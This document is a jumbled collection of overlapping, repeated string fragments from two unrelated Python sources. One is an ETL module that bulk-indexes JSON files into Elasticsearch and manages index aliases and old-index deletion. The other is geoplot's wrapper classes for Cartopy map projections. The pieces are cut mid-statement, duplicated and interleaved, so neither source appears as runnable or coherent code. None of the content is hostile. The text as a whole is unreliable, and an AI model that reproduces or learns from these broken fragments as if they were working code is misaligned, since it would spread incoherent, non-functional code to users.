.format(source_bulk_dir)) bulk_files = list(list_entity_files(source_bulk_dir)) all_document_types", "= list(list_entity_files(source_bulk_dir)) all_document_types = set(map(first, bulk_files)) document_types = load_config.get('document-types') or", "in document_types: base_index_name = replace_template( load_config['index-template'], {'source': source['schema:identifier'], 'documentType': document_type}", "index_name) in index_by_document.items(): create_alias(es_client, index_name, base_index_name, logger) new_index, *old_indices =", "if not os.path.exists(bulk_dir): raise Exception('No json bulk folder found in", "index_name = base_index_name + '-d' + str(timestamp) create_index(es_client, index_name, logger)", "logger.debug('Deleting index \"{}\"...'.format(index_name)) check_error(es_client.indices.delete(index_name)) def create_template(es_client, es_config, document_type, base_index_name, logger):", "launch the transformation process.' .format(source_bulk_dir)) bulk_files = list(list_entity_files(source_bulk_dir)) all_document_types =", "\"{}\"'.format(alias_name, base_index_name)) check_error(es_client.indices.put_alias(alias_name, base_index_name)) def get_indices(es_client, base_index_name): indices = es_client.cat.indices(base_index_name", "document_type, base_index_name, logger): template_name = 'template_elixir_' + base_index_name template_pattern =", "index_name)) with open(file_path, 'r') as file: check_error(es_client.bulk(index=index_name, body=file.read(), timeout='2000ms')) def", "aliases and deleting old indices...\") for document_type, (base_index_name, index_name) in", "sure you have run the BrAPI extraction and Elasticsearch document", "init_es_client(url, logger): es_client = elasticsearch.Elasticsearch([url]) try: info = es_client.info() logger.debug('Connected", "(source_name, source) in sources.items(): source_bulk_dir = get_folder_path([bulk_dir, source_name]) load_source(source, config,", "in index_by_document: base_index_name, index_name = index_by_document[document_type] bulk_index(es_client, index_name, file_path, logger)", "raise FileNotFoundError( 'No such file or directory: \\'{}\\'.\\n' 'Please make", "' + bulk_dir) sources = config['sources'] for (source_name, source) in", "file \"{}\" in index \"{}\"...'.format(file_name, index_name)) with open(file_path, 'r') as", "index_name, logger): logger.debug('Deleting index \"{}\"...'.format(index_name)) check_error(es_client.indices.delete(index_name)) def create_template(es_client, es_config, document_type,", "ElasticSearchException(response) def create_index(es_client, index_name, logger): logger.debug('Creating index \"{}\"...'.format(index_name)) check_error(es_client.indices.create(index_name)) def", "logger.info(\"Loading '{}' into elasticsearch '{}'...\".format(source_bulk_dir, load_config['url'])) try: if not os.path.exists(source_bulk_dir):", "def load_source(source, config, source_bulk_dir, log_dir): \"\"\" Full Elasticsearch documents indexing", "\"=> Check the logs ({}) for more details.\" .format(source_name, log_file))", "es_client def check_error(response): if response.get('errors'): raise ElasticSearchException(response) def create_index(es_client, index_name,", "time import traceback import elasticsearch from etl.common.store import list_entity_files from", "from etl.common.utils import get_folder_path, get_file_path, create_logger, first, replace_template class ElasticSearchException(Exception):", "index_name, logger): logger.debug('Creating index \"{}\"...'.format(index_name)) 
check_error(es_client.indices.create(index_name)) def delete_index(es_client, index_name, logger):", "= replace_template( load_config['index-template'], {'source': source['schema:identifier'], 'documentType': document_type} ).lower() create_template(es_client, load_config,", "check_error(es_client.indices.create(index_name)) def delete_index(es_client, index_name, logger): logger.debug('Deleting index \"{}\"...'.format(index_name)) check_error(es_client.indices.delete(index_name)) def", "file_path, logger): file_name = os.path.basename(file_path) logger.debug('Bulk indexing file \"{}\" in", "Check the logs ({}) for more details.\" .format(source_name, log_file)) def", "if response.get('errors'): raise ElasticSearchException(response) def create_index(es_client, index_name, logger): logger.debug('Creating index", "params={'h': 'index'}) index_names = list(map(lambda i: i['index'], indices)) index_names.sort(reverse=True) return", "log_dir = config['log-dir'] bulk_dir = os.path.join(config['data-dir'], 'json-bulk') if not os.path.exists(bulk_dir):", "source_bulk_dir, log_dir): \"\"\" Full Elasticsearch documents indexing \"\"\" source_name =", "= config['sources'] for (source_name, source) in sources.items(): source_bulk_dir = get_folder_path([bulk_dir,", "create_logger, first, replace_template class ElasticSearchException(Exception): pass # Init Elasticsearch and", "create_logger(source_name, log_file, config['options']['verbose']) load_config = config['load-elasticsearch'] es_client = init_es_client(load_config['url'], logger)", "make sure you have run the BrAPI extraction and Elasticsearch", "logger) new_index, *old_indices = get_indices(es_client, base_index_name) for old_index in old_indices[1:]:", "raise e return es_client def check_error(response): if response.get('errors'): raise ElasticSearchException(response)", "files into elasticsearch import json import os import time import", "' before trying to launch the transformation process.' .format(source_bulk_dir)) bulk_files", "'documentType': document_type} ).lower() create_template(es_client, load_config, document_type, base_index_name, logger) index_name =", "list(map(lambda i: i['index'], indices)) index_names.sort(reverse=True) return index_names def load_source(source, config,", "all_document_types document_types = document_types.intersection(all_document_types) index_by_document = dict() logger.info(\"Preparing index with", ").lower() create_template(es_client, load_config, document_type, base_index_name, logger) index_name = base_index_name +", "load_config['url'])) try: if not os.path.exists(source_bulk_dir): raise FileNotFoundError( 'No such file", "import json import os import time import traceback import elasticsearch", "details.\" .format(source_name, log_file)) def main(config): log_dir = config['log-dir'] bulk_dir =", "the BrAPI extraction and Elasticsearch document transformation' ' before trying", "old indices...\") for document_type, (base_index_name, index_name) in index_by_document.items(): create_alias(es_client, index_name,", "the transformation process.' 
.format(source_bulk_dir)) bulk_files = list(list_entity_files(source_bulk_dir)) all_document_types = set(map(first,", "= index_by_document[document_type] bulk_index(es_client, index_name, file_path, logger) logger.info(\"Creating index aliases and", "document_types: base_index_name = replace_template( load_config['index-template'], {'source': source['schema:identifier'], 'documentType': document_type} ).lower()", "str(timestamp) create_index(es_client, index_name, logger) index_by_document[document_type] = base_index_name, index_name logger.info(\"Bulk indexing...\")", "ElasticSearchException(Exception): pass # Init Elasticsearch and test connection def init_es_client(url,", "for document_type, (base_index_name, index_name) in index_by_document.items(): create_alias(es_client, index_name, base_index_name, logger)", "e: logger.debug(traceback.format_exc()) logger.debug(getattr(e, 'long_message', '')) logger.info(\"FAILED Loading {} Elasticsearch documents.\\n\"", "sources = config['sources'] for (source_name, source) in sources.items(): source_bulk_dir =", "template_pattern = base_index_name + '-d*' mapping = es_config['document-mappings'].get(document_type+\"_mapping\") if not", "document_types = document_types.intersection(all_document_types) index_by_document = dict() logger.info(\"Preparing index with template", "bulk_index(es_client, index_name, file_path, logger) logger.info(\"Creating index aliases and deleting old", "Elasticsearch unavailable on \"{}\".\\nPlease check your configuration'.format(url)) raise e return", "indexing file \"{}\" in index \"{}\"...'.format(file_name, index_name)) with open(file_path, 'r')", "as file: check_error(es_client.bulk(index=index_name, body=file.read(), timeout='2000ms')) def create_alias(es_client, alias_name, base_index_name, logger):", "logger.debug('Connected to node \"{}\" of cluster \"{}\" on \"{}\"'.format(info['name'], info['cluster_name'],", "Init Elasticsearch and test connection def init_es_client(url, logger): es_client =", "timeout='2000ms')) def create_alias(es_client, alias_name, base_index_name, logger): logger.debug('Creating alias \"{}\" for", "with template mapping...\") timestamp = int(time.time()) for document_type in document_types:", "logger.error('Connection error: Elasticsearch unavailable on \"{}\".\\nPlease check your configuration'.format(url)) raise", "\\'{}\\'.\\n' 'Please make sure you have run the BrAPI extraction", "as e: logger.error('Connection error: Elasticsearch unavailable on \"{}\".\\nPlease check your", "index_name logger.info(\"Bulk indexing...\") for document_type, file_path in bulk_files: if document_type", "template_name = 'template_elixir_' + base_index_name template_pattern = base_index_name + '-d*'", "create_alias(es_client, alias_name, base_index_name, logger): logger.debug('Creating alias \"{}\" for index \"{}\"'.format(alias_name,", "bulk_files)) document_types = load_config.get('document-types') or all_document_types document_types = document_types.intersection(all_document_types) index_by_document", "pattern \"{}\"...'.format(template_name, template_pattern)) template_body = {'template': template_pattern, 'mappings': mapping} if", "\"\"\" Full Elasticsearch documents indexing \"\"\" source_name = source['schema:identifier'] action", "except Exception as e: logger.debug(traceback.format_exc()) logger.debug(getattr(e, 'long_message', '')) logger.info(\"FAILED Loading", "index_by_document.items(): create_alias(es_client, index_name, base_index_name, logger) new_index, *old_indices = 
def load_source(source, config, source_bulk_dir, log_dir):
    """
    Full Elasticsearch documents indexing
    """
    source_name = source['schema:identifier']
    action = 'load-elasticsearch-' + source_name
    log_file = get_file_path([log_dir, action], ext='.log')
    logger = create_logger(source_name, log_file, config['options']['verbose'])

    load_config = config['load-elasticsearch']
    es_client = init_es_client(load_config['url'], logger)

    logger.info("Loading '{}' into elasticsearch '{}'...".format(source_bulk_dir, load_config['url']))
    try:
        if not os.path.exists(source_bulk_dir):
            raise FileNotFoundError(
                'No such file or directory: \'{}\'.\n'
                'Please make sure you have run the BrAPI extraction and Elasticsearch document transformation'
                ' before trying to launch the loading process.'
                .format(source_bulk_dir))

        bulk_files = list(list_entity_files(source_bulk_dir))
        all_document_types = set(map(first, bulk_files))
        document_types = load_config.get('document-types') or all_document_types
        document_types = document_types.intersection(all_document_types)
        index_by_document = dict()

        logger.info("Preparing index with template mapping...")
        timestamp = int(time.time())
        for document_type in document_types:
            base_index_name = replace_template(
                load_config['index-template'],
                {'source': source['schema:identifier'], 'documentType': document_type}
            ).lower()

            create_template(es_client, load_config, document_type, base_index_name, logger)

            index_name = base_index_name + '-d' + str(timestamp)
            create_index(es_client, index_name, logger)
            index_by_document[document_type] = base_index_name, index_name

        logger.info("Bulk indexing...")
        for document_type, file_path in bulk_files:
            if document_type in index_by_document:
                base_index_name, index_name = index_by_document[document_type]
                bulk_index(es_client, index_name, file_path, logger)

        logger.info("Creating index aliases and deleting old indices...")
        for document_type, (base_index_name, index_name) in index_by_document.items():
            create_alias(es_client, index_name, base_index_name, logger)
            # Keep the newly created index and the most recent previous one;
            # delete anything older.
            new_index, *old_indices = get_indices(es_client, base_index_name)
            for old_index in old_indices[1:]:
                delete_index(es_client, old_index, logger)

        logger.info("SUCCEEDED Loading {}.".format(source_name))
    except Exception as e:
        logger.debug(traceback.format_exc())
        logger.debug(getattr(e, 'long_message', ''))
        logger.info("FAILED Loading {} Elasticsearch documents.\n"
                    "=> Check the logs ({}) for more details."
                    .format(source_name, log_file))


def main(config):
    log_dir = config['log-dir']
    bulk_dir = os.path.join(config['data-dir'], 'json-bulk')
    if not os.path.exists(bulk_dir):
        raise Exception('No json bulk folder found in {}'.format(bulk_dir))

    sources = config['sources']
    for (source_name, source) in sources.items():
        source_bulk_dir = get_folder_path([bulk_dir, source_name])
        load_source(source, config, source_bulk_dir, log_dir)
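
# Usage sketch (not part of the original module): a minimal configuration
# dict for main(), inferred from the keys that main() and load_source()
# read above. All paths, the source identifier, and the index template
# value are hypothetical.
if __name__ == '__main__':
    example_config = {
        'log-dir': 'log',
        'data-dir': 'data',
        'options': {'verbose': True},
        'sources': {'GnpIS': {'schema:identifier': 'GnpIS'}},
        'load-elasticsearch': {
            'url': 'http://localhost:9200',
            'index-template': '{source}-{documentType}',  # assumed placeholder syntax
            'document-types': {'germplasm'},
            'document-mappings': {'germplasm_mapping': {}},
        },
    }
    main(example_config)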
[ "outputs. For the list of Cartopy CRS objects this module", "instance parameter, which together control the center of the plot,", "---------- `load` : Return a Cartopy CRS initialized with defaults", "with empty `df` and `centerings`. \"\"\" def __init__(self, **kwargs): \"\"\"Save", "object without having first called ``load``: most prominently, when creating", "provided in each of the ``geoplot`` top-level plot functions; each", "does, exactly, are not important: it suffices to know that", "``geoplot.crs`` object called by ``matplotlib``, it silently swaps itself out", "method is a better way: when a ``geoplot.crs`` object called", "AzimuthalEquidistant,\\ LambertConformal,\\ Orthographic,\\ Stereographic,\\ TransverseMercator,\\ LambertAzimuthalEqualArea,\\ UTM,\\ OSGB,\\ EuroPP,\\ OSNI", "as this projection is centered on the North Pole!). A", "name in ('AlbersEqualArea', 'AzimuthalEquidistant', 'LambertConformal', 'Orthographic', 'Stereographic', 'TransverseMercator', 'LambertAzimuthalEqualArea', 'UTM',", "EuroPP,\\ OSNI = tuple( type(name, (Base,), {}) for name in", "them to the ``_generic_load`` method here. We then in turn", "on the North Pole!). A top-level centerings method is provided", "projection instance The instance in question (self, in the method", "\"\"\" A meta-method which abstracts the internals of individual projections'", "provided by the user. \"\"\" return getattr(ccrs, self.__class__.__name__)(**{**centerings, **self.args}) def", "(using the function defined immediately above). Since we control what", "prominently, when creating a plot containing subplots, the \"overall\" projection", "the user. \"\"\" return getattr(ccrs, self.__class__.__name__)(**{**centerings, **self.args}) def _as_mpl_axes(self): \"\"\"", "better way: when a ``geoplot.crs`` object called by ``matplotlib``, it", "of executing ``_as_mpl_axes`` on that object instead. \"\"\" proj =", "parameter, implying that latitude is fixed (as indeed it is,", "functions from this list relevent to this particular instance and", "The GeoDataFrame which has been passed as input to the", "``cartopy.crs`` object instance Returns a ``cartopy.crs`` object instance whose appropriate", "http://scitools.org.uk/cartopy/docs/latest/crs/projections.html. \"\"\" import cartopy.crs as ccrs import geopandas as gpd", "geopandas as gpd class Base: # TODO: RotatedPole \"\"\" Generate", "function body. But there are also use cases outside of", "that function's ``_as_mpl_axes`` instead. Parameters ---------- proj : geoplot.crs projection", "if key in self.filter_} ) class LongitudeCentering(Filtering): \"\"\"Form a CRS", "(LongitudeCentering,), {}) for name in ('PlateCarree', 'LambertCylindrical', 'Mercator', 'Miller', 'Mollweide',", "``geoplot`` top-level plot functions; each of the projection wrapper classes", "not already provided by the user. \"\"\" return getattr(ccrs, self.__class__.__name__)(**{**centerings,", "use cases outside of our control in which we are", "self.__class__.__name__)(**{**centerings, **self.args}) def _as_mpl_axes(self): \"\"\" When ``matplotlib`` is provided a", "def _as_mpl_axes(self): \"\"\" When ``matplotlib`` is provided a projection via", "with defaults from the `centerings` dictionary, overridden by initialization parameters.", "``geoplot`` coordinate reference system classes, wrappers on ``cartopy.crs`` objects meant", "class name. 
Parameters ---------- `load` : Return a Cartopy CRS", "class LatitudeCentering(Filtering): \"\"\"For a CRS that centers by latitude.\"\"\" filter_", "from this list relevent to this particular instance and passes", "suffices to know that every ``cartopy`` coordinate reference system object", "twice-instantiation loading in the first place. centerings: dict A dictionary", "plot, while the North Pole Stereo projection has only a", "method is provided in each of the ``geoplot`` top-level plot", "`centerings` filtered to keys in `self.filter_`.\"\"\" return super().load( df, {key:", "import geopandas as gpd class Base: # TODO: RotatedPole \"\"\"", "that initialize Cartopy CRSs.\"\"\" self.args = kwargs def load(self, df,", "control what ``geoplot`` does at execution, we gracefully integrate this", "Pole!). A top-level centerings method is provided in each of", "{}) AlbersEqualArea,\\ AzimuthalEquidistant,\\ LambertConformal,\\ Orthographic,\\ Stereographic,\\ TransverseMercator,\\ LambertAzimuthalEqualArea,\\ UTM,\\ OSGB,\\", "and centering of the data occurs automatically (using the function", "get around this by using ``cartopy.crs`` objects instead, but this", "parameters that initialize Cartopy CRSs.\"\"\" self.args = kwargs def load(self,", "the first place. centerings: dict A dictionary containing names and", "df, {key: value for key, value in centerings.items() if key", "filter_ = {'central_longitude'} class LatitudeCentering(Filtering): \"\"\"For a CRS that centers", "top level. This data is needed to calculate reasonable centering", "centers by latitude.\"\"\" filter_ = {'central_latitude'} PlateCarree,\\ LambertCylindrical,\\ Mercator,\\ Miller,\\", "to be used as parameters to the ``projection`` parameter of", "when creating a plot containing subplots, the \"overall\" projection must", "of all front-end ``geoplot`` outputs. For the list of Cartopy", "input to the plotter at the top level. This data", "object has one. When we pass a ``geoplot.crs`` crs object", "'Miller', 'Mollweide', 'Robinson', 'Sinusoidal', 'InterruptedGoodeHomolosine', 'Geostationary', 'NorthPolarStereo', 'SouthPolarStereo') ) Gnomonic", "here. We then in turn execute these functions to get", "on ``cartopy.crs`` objects meant to be used as parameters to", "expects to get something with a callable ``as_mpl_axes`` method. The", "a ``geoplot.crs`` object called by ``matplotlib``, it silently swaps itself", "contains both ``central_longitude`` and ``central_latitude`` instance parameter, which together control", "name in ('PlateCarree', 'LambertCylindrical', 'Mercator', 'Miller', 'Mollweide', 'Robinson', 'Sinusoidal', 'InterruptedGoodeHomolosine',", "to calculate reasonable centering variables in cases in which the", "{key: value for key, value in centerings.items() if key in", "'Sinusoidal', 'InterruptedGoodeHomolosine', 'Geostationary', 'NorthPolarStereo', 'SouthPolarStereo') ) Gnomonic = type('Gnomonic', (LatitudeCentering,),", "Return a Cartopy CRS initialized with defaults from the `centerings`", "= tuple( type(name, (Base,), {}) for name in ('AlbersEqualArea', 'AzimuthalEquidistant',", "``cartopy.crs``.*name* where *name* matches the instance's class name. Parameters ----------", "passed as input to the plotter at the top level.", "to reasonable defaults wherever not already provided by the user.", "Certain projections have certain centering parameters whilst others lack them.", "TODO: RotatedPole \"\"\" Generate instances of ``cartopy.crs``.*name* where *name* matches", "projections' load procedures. 
Parameters ---------- df : GeoDataFrame The GeoDataFrame", "``cartopy.crs`` objects instead, but this is inelegant. This method is", "This method is a better way: when a ``geoplot.crs`` object", "fixed (as indeed it is, as this projection is centered", "whilst others lack them. For example, the geospatial projection contains", "top-level plot functions; each of the projection wrapper classes defined", ") class LongitudeCentering(Filtering): \"\"\"Form a CRS that centers by longitude.\"\"\"", "having first called ``load``: most prominently, when creating a plot", "TransverseMercator,\\ LambertAzimuthalEqualArea,\\ UTM,\\ OSGB,\\ EuroPP,\\ OSNI = tuple( type(name, (Base,),", "the North Pole!). A top-level centerings method is provided in", "occurs automatically (using the function defined immediately above). Since we", "swaps itself out for a vanilla version of its ``cartopy.crs``", "object to a ``geoplot`` function, the loading and centering of", "the top level. This data is needed to calculate reasonable", "using ``cartopy.crs`` objects instead, but this is inelegant. This method", "objects this module derives from, refer to http://scitools.org.uk/cartopy/docs/latest/crs/projections.html. \"\"\" import", "a ``cartopy.crs`` object instance whose appropriate instance variables have been", "precise details of what this method does, exactly, are not", "CRS objects this module derives from, refer to http://scitools.org.uk/cartopy/docs/latest/crs/projections.html. \"\"\"", "'Mollweide', 'Robinson', 'Sinusoidal', 'InterruptedGoodeHomolosine', 'Geostationary', 'NorthPolarStereo', 'SouthPolarStereo') ) Gnomonic =", "Miller,\\ Mollweide,\\ Robinson,\\ Sinusoidal,\\ InterruptedGoodeHomolosine,\\ Geostationary,\\ NorthPolarStereo,\\ SouthPolarStereo = tuple(", "the user does not already provide them; which is, incidentally,", "centerings: dict A dictionary containing names and centering methods. Certain", "parameter, which together control the center of the plot, while", "``_as_mpl_axes`` for `self.load` called with empty `df` and `centerings`. \"\"\"", "provided a projection via a ``projection`` keyword argument, it expects", "is, as this projection is centered on the North Pole!).", "where *name* matches the instance's class name. Parameters ---------- `load`", "certain centering parameters whilst others lack them. For example, the", "of our control in which we are forced to pass", "names and centering methods. Certain projections have certain centering parameters", "passes them to the ``_generic_load`` method here. We then in", "which abstracts the internals of individual projections' load procedures. Parameters", "*name* matches the instance's class name. Parameters ---------- `load` :", "variables have been set to reasonable defaults wherever not already", "coordinate reference system classes, wrappers on ``cartopy.crs`` objects meant to", "when a ``geoplot.crs`` object called by ``matplotlib``, it silently swaps", "to http://scitools.org.uk/cartopy/docs/latest/crs/projections.html. \"\"\" import cartopy.crs as ccrs import geopandas as", "mirror, and calls that function's ``_as_mpl_axes`` instead. Parameters ---------- proj", "there are also use cases outside of our control in", ": geoplot.crs projection instance The instance in question (self, in", "behind all of this funny twice-instantiation loading in the first", "a plot containing subplots, the \"overall\" projection must be pre-loaded.", "every ``cartopy`` coordinate reference system object has one. 
When we", "Cartopy CRS objects this module derives from, refer to http://scitools.org.uk/cartopy/docs/latest/crs/projections.html.", "return super().load( df, {key: value for key, value in centerings.items()", "centering variables in cases in which the user does not", "called ``load``: most prominently, when creating a plot containing subplots,", "in cases in which the user does not already provide", "variables in cases in which the user does not already", "that `load`s with `centering` restricted to keys in `self.filter_`.\"\"\" def", "= type('Gnomonic', (LatitudeCentering,), {}) AlbersEqualArea,\\ AzimuthalEquidistant,\\ LambertConformal,\\ Orthographic,\\ Stereographic,\\ TransverseMercator,\\", "module derives from, refer to http://scitools.org.uk/cartopy/docs/latest/crs/projections.html. \"\"\" import cartopy.crs as", "`centering` restricted to keys in `self.filter_`.\"\"\" def load(self, df, centerings):", "projection contains both ``central_longitude`` and ``central_latitude`` instance parameter, which together", "def load(self, df, centerings): \"\"\"Call `load` method with `centerings` filtered", "`centerings`. \"\"\" def __init__(self, **kwargs): \"\"\"Save parameters that initialize Cartopy", "indeed it is, as this projection is centered on the", "Returns a ``cartopy.crs`` object instance whose appropriate instance variables have", "pass them off to our output ``cartopy.crs`` instance. Returns -------", "LatitudeCentering(Filtering): \"\"\"For a CRS that centers by latitude.\"\"\" filter_ =", "of ``cartopy.crs``.*name* where *name* matches the instance's class name. Parameters", "them. For example, the geospatial projection contains both ``central_longitude`` and", "as gpd class Base: # TODO: RotatedPole \"\"\" Generate instances", "the result of executing ``_as_mpl_axes`` on that object instead. \"\"\"", "returns the result of executing ``_as_mpl_axes`` on that object instead.", "This module defines the ``geoplot`` coordinate reference system classes, wrappers", "of the projection wrapper classes defined here in turn selects", "defaults wherever not already provided by the user. \"\"\" return", "crs : ``cartopy.crs`` object instance Returns a ``cartopy.crs`` object instance", "at the top level. This data is needed to calculate", "the loading and centering of the data occurs automatically (using", "version of its ``cartopy.crs`` mirror, and calls that function's ``_as_mpl_axes``", "reference system object has one. When we pass a ``geoplot.crs``", "this by using ``cartopy.crs`` objects instead, but this is inelegant.", "is a better way: when a ``geoplot.crs`` object called by", "it silently swaps itself out for a vanilla version of", "we gracefully integrate this two-step procedure into the function body.", "execution, we gracefully integrate this two-step procedure into the function", "is inelegant. This method is a better way: when a", "``matplotlib``, it silently swaps itself out for a vanilla version", "of what this method does, exactly, are not important: it", "our output ``cartopy.crs`` instance. 
Returns ------- crs : ``cartopy.crs`` object", "turn selects the functions from this list relevent to this", "for name in ('PlateCarree', 'LambertCylindrical', 'Mercator', 'Miller', 'Mollweide', 'Robinson', 'Sinusoidal',", "data is needed to calculate reasonable centering variables in cases", "def load(self, df, centerings): \"\"\" A meta-method which abstracts the", "list relevent to this particular instance and passes them to", "**kwargs): \"\"\"Save parameters that initialize Cartopy CRSs.\"\"\" self.args = kwargs", "When we pass a ``geoplot.crs`` crs object to a ``geoplot``", "vanilla version of its ``cartopy.crs`` mirror, and calls that function's", "Parameters ---------- df : GeoDataFrame The GeoDataFrame which has been", "both ``central_longitude`` and ``central_latitude`` instance parameter, which together control the", "one. When we pass a ``geoplot.crs`` crs object to a", "Mercator,\\ Miller,\\ Mollweide,\\ Robinson,\\ Sinusoidal,\\ InterruptedGoodeHomolosine,\\ Geostationary,\\ NorthPolarStereo,\\ SouthPolarStereo =", "`self.filter_`.\"\"\" def load(self, df, centerings): \"\"\"Call `load` method with `centerings`", "centering parameters whilst others lack them. For example, the geospatial", "is provided a projection via a ``projection`` keyword argument, it", "which the user does not already provide them; which is,", "important: it suffices to know that every ``cartopy`` coordinate reference", "\"\"\" return getattr(ccrs, self.__class__.__name__)(**{**centerings, **self.args}) def _as_mpl_axes(self): \"\"\" When ``matplotlib``", "UTM,\\ OSGB,\\ EuroPP,\\ OSNI = tuple( type(name, (Base,), {}) for", "('AlbersEqualArea', 'AzimuthalEquidistant', 'LambertConformal', 'Orthographic', 'Stereographic', 'TransverseMercator', 'LambertAzimuthalEqualArea', 'UTM', 'OSGB', 'EuroPP',", "Stereo projection has only a ``central_longitude`` instance parameter, implying that", "methods. Certain projections have certain centering parameters whilst others lack", "not already provide them; which is, incidentally, the reason behind", "a ``central_longitude`` instance parameter, implying that latitude is fixed (as", "`df` and `centerings`. \"\"\" def __init__(self, **kwargs): \"\"\"Save parameters that", "`centerings` dictionary, overridden by initialization parameters. `_as_mpl_axes` : Return the", "possible to get around this by using ``cartopy.crs`` objects instead,", "function, the loading and centering of the data occurs automatically", "geospatial projection contains both ``central_longitude`` and ``central_latitude`` instance parameter, which", "which is, incidentally, the reason behind all of this funny", "details of what this method does, exactly, are not important:", "self.args = kwargs def load(self, df, centerings): \"\"\" A meta-method", "A dictionary containing names and centering methods. Certain projections have", "system object has one. When we pass a ``geoplot.crs`` crs", "restricted to keys in `self.filter_`.\"\"\" def load(self, df, centerings): \"\"\"Call", "all front-end ``geoplot`` outputs. For the list of Cartopy CRS", "a projection via a ``projection`` keyword argument, it expects to", "our ``df`` and pass them off to our output ``cartopy.crs``", "`self.filter_`.\"\"\" return super().load( df, {key: value for key, value in", "``projection`` parameter of all front-end ``geoplot`` outputs. 
For the list", "keyword argument, it expects to get something with a callable", "in turn selects the functions from this list relevent to", "integrate this two-step procedure into the function body. But there", "two-step procedure into the function body. But there are also", "``geoplot`` function, the loading and centering of the data occurs", "`_as_mpl_axes` : Return the result of calling cartopy's ``_as_mpl_axes`` for", "object and returns the result of executing ``_as_mpl_axes`` on that", "(LatitudeCentering,), {}) AlbersEqualArea,\\ AzimuthalEquidistant,\\ LambertConformal,\\ Orthographic,\\ Stereographic,\\ TransverseMercator,\\ LambertAzimuthalEqualArea,\\ UTM,\\", "has been passed as input to the plotter at the", "functions to get defaults for our ``df`` and pass them", "without having first called ``load``: most prominently, when creating a", "centerings method is provided in each of the ``geoplot`` top-level", "executing ``_as_mpl_axes`` on that object instead. \"\"\" proj = self.load(gpd.GeoDataFrame(),", "\"\"\" When ``matplotlib`` is provided a projection via a ``projection``", "pre-loaded. It's possible to get around this by using ``cartopy.crs``", "it is, as this projection is centered on the North", "instead. \"\"\" proj = self.load(gpd.GeoDataFrame(), dict()) return proj._as_mpl_axes() class Filtering(Base):", "CRS that centers by longitude.\"\"\" filter_ = {'central_longitude'} class LatitudeCentering(Filtering):", "{}) for name in ('PlateCarree', 'LambertCylindrical', 'Mercator', 'Miller', 'Mollweide', 'Robinson',", "Robinson,\\ Sinusoidal,\\ InterruptedGoodeHomolosine,\\ Geostationary,\\ NorthPolarStereo,\\ SouthPolarStereo = tuple( type(name, (LongitudeCentering,),", "execute these functions to get defaults for our ``df`` and", "top-level centerings method is provided in each of the ``geoplot``", "this is inelegant. This method is a better way: when", "initialized with defaults from the `centerings` dictionary, overridden by initialization", "been set to reasonable defaults wherever not already provided by", "is centered on the North Pole!). A top-level centerings method", "a ``geoplot.crs`` crs object to a ``geoplot`` function, the loading", "as input to the plotter at the top level. This", "coordinate reference system object has one. When we pass a", "Filtering(Base): \"\"\"CRS that `load`s with `centering` restricted to keys in", "by longitude.\"\"\" filter_ = {'central_longitude'} class LatitudeCentering(Filtering): \"\"\"For a CRS", "= {'central_longitude'} class LatitudeCentering(Filtering): \"\"\"For a CRS that centers by", "``geoplot`` does at execution, we gracefully integrate this two-step procedure", "cases outside of our control in which we are forced", "wrapper classes defined here in turn selects the functions from", "``geoplot.crs`` object without having first called ``load``: most prominently, when", "instead. Parameters ---------- proj : geoplot.crs projection instance The instance", "Orthographic,\\ Stereographic,\\ TransverseMercator,\\ LambertAzimuthalEqualArea,\\ UTM,\\ OSGB,\\ EuroPP,\\ OSNI = tuple(", "and pass them off to our output ``cartopy.crs`` instance. 
Returns", ": ``cartopy.crs`` object instance Returns a ``cartopy.crs`` object instance whose", "getattr(ccrs, self.__class__.__name__)(**{**centerings, **self.args}) def _as_mpl_axes(self): \"\"\" When ``matplotlib`` is provided", "GeoDataFrame The GeoDataFrame which has been passed as input to", "pass a ``geoplot.crs`` crs object to a ``geoplot`` function, the", "most prominently, when creating a plot containing subplots, the \"overall\"", "body). Returns ------- Mutates into a ``cartopy.crs`` object and returns", "cartopy.crs as ccrs import geopandas as gpd class Base: #", "that object instead. \"\"\" proj = self.load(gpd.GeoDataFrame(), dict()) return proj._as_mpl_axes()", "projection is centered on the North Pole!). A top-level centerings", "derives from, refer to http://scitools.org.uk/cartopy/docs/latest/crs/projections.html. \"\"\" import cartopy.crs as ccrs", "data occurs automatically (using the function defined immediately above). Since", "question (self, in the method body). Returns ------- Mutates into", "``_generic_load`` method here. We then in turn execute these functions", "``df`` and pass them off to our output ``cartopy.crs`` instance.", "object instance whose appropriate instance variables have been set to", "something with a callable ``as_mpl_axes`` method. The precise details of", "the North Pole Stereo projection has only a ``central_longitude`` instance", "to the ``projection`` parameter of all front-end ``geoplot`` outputs. For", "a ``projection`` keyword argument, it expects to get something with", ": Return the result of calling cartopy's ``_as_mpl_axes`` for `self.load`", "------- crs : ``cartopy.crs`` object instance Returns a ``cartopy.crs`` object", "method body). Returns ------- Mutates into a ``cartopy.crs`` object and", "``cartopy.crs`` instance. Returns ------- crs : ``cartopy.crs`` object instance Returns", "we pass a ``geoplot.crs`` crs object to a ``geoplot`` function,", "Mollweide,\\ Robinson,\\ Sinusoidal,\\ InterruptedGoodeHomolosine,\\ Geostationary,\\ NorthPolarStereo,\\ SouthPolarStereo = tuple( type(name,", "`self.load` called with empty `df` and `centerings`. \"\"\" def __init__(self,", "the ``projection`` parameter of all front-end ``geoplot`` outputs. For the", "kwargs def load(self, df, centerings): \"\"\" A meta-method which abstracts", "object instead. \"\"\" proj = self.load(gpd.GeoDataFrame(), dict()) return proj._as_mpl_axes() class", "class LongitudeCentering(Filtering): \"\"\"Form a CRS that centers by longitude.\"\"\" filter_", "body. But there are also use cases outside of our", "on that object instead. \"\"\" proj = self.load(gpd.GeoDataFrame(), dict()) return", "in centerings.items() if key in self.filter_} ) class LongitudeCentering(Filtering): \"\"\"Form", "internals of individual projections' load procedures. Parameters ---------- df :", "the functions from this list relevent to this particular instance", "centering methods. Certain projections have certain centering parameters whilst others", "particular instance and passes them to the ``_generic_load`` method here.", "in each of the ``geoplot`` top-level plot functions; each of", "\"\"\" proj = self.load(gpd.GeoDataFrame(), dict()) return proj._as_mpl_axes() class Filtering(Base): \"\"\"CRS", "immediately above). 
